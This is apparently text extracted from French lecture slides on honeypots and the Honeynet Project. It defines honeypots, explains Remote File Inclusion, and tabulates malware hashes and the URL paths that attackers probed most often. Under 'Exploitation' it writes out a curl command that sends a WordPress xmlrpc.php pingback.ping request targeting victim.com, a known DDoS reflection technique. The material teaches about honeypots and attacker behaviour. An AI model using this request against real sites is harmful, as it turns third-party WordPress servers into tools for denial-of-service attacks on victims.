Beruflich Dokumente
Kultur Dokumente
Know yourself and know your enemies, and of a hundred battles you will
have a hundred victories. -Sun Tzu The Art of War
Plan
Dfinition
Honeynet project
Application
Dfinition
En gnral les pots de miel sont des machines physiques ou virtuelles destine tre
attaques afin de collecter le plus dinformations sur les techniques dintrusion ou
lidentit des pirates.
Buts
Peut aussi tre utilis comme outil prventif avant quun systme rel
de production ne soit atteint
Honeypots de production
Honeypots de recherche
Honeynet project
Ces informations sont publies sur les pages blanches Know Your
Enemy, sur les blogs ou via les challenges Scan of the Month
Remote File Inclusion (RFI) est une vulnrabilit trouve sur les sites web
permettant dinjecter un fichier distance, le plus souvent grce un script
sur le serveur web. Cest du au fait dutiliser des champs dentres pour les
utilisateurs sans une validation approprie. Ceci peut conduire des failles
aussi srieuses que lexcution de code sur le serveur web.
Hash
Hits
30a7bb30303f7da9ad102edc313dc80e
929
0 / 52
ab4d03072cc0532afc83d13854ed7e4f
577
22 / 49
474c4daeff3d82ae49d7c96acb8c0d84
514
21 / 53
9f67913d2c77545a4187053ad18230e4
496
7 / 52
369aab6f3a40d0259e6b036b68c27d25
411
7 / 54
10b5c4f77bbd80a3886e591dc3426198
267
N/A
6427bb17f4922b82c0147099429cfef9
203
3 / 53
be52cd4e8a8f6e42418c87d3468bba20
191
9 / 51
f922514cec9b9dc9c74b99ce9e39d3bc
164
15 / 53
46f5757064a2a0a081d6fd099f2916b5
159
18 / 46
Count
admin
467194
administrator/index.php
73285
changes.html
13193
wp-login.php
11248
awstats/awstats.pl
9961
robots.txt
8620
xmlrpc.php
8175
index.php?app=core&module=global§ion=login&do=process
7339
phpMyAdmin-2.5.5/index.php
3738
phpMyAdmin-2.5.5-pl1/index.php
3712
awstats/awstats.pl?framename=mainright&output=refererpages
3538
Exploitation
$ curl -D - "www.anywordpresssite.com/xmlrpc.php" -d
'<methodCall><methodName>pingback.ping</methodName><params><param><value><string
>http://victim.com</string></value></param><param><value><string>www.anywordpresssite.c
om/postchosen</string></value></param></params></methodCall>
..
Bibliographie
[4] www.honeynet.org/
[5] http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sitesused-for-distributed-denial-of-service-attack.html
[6] wikipedia.org/
Application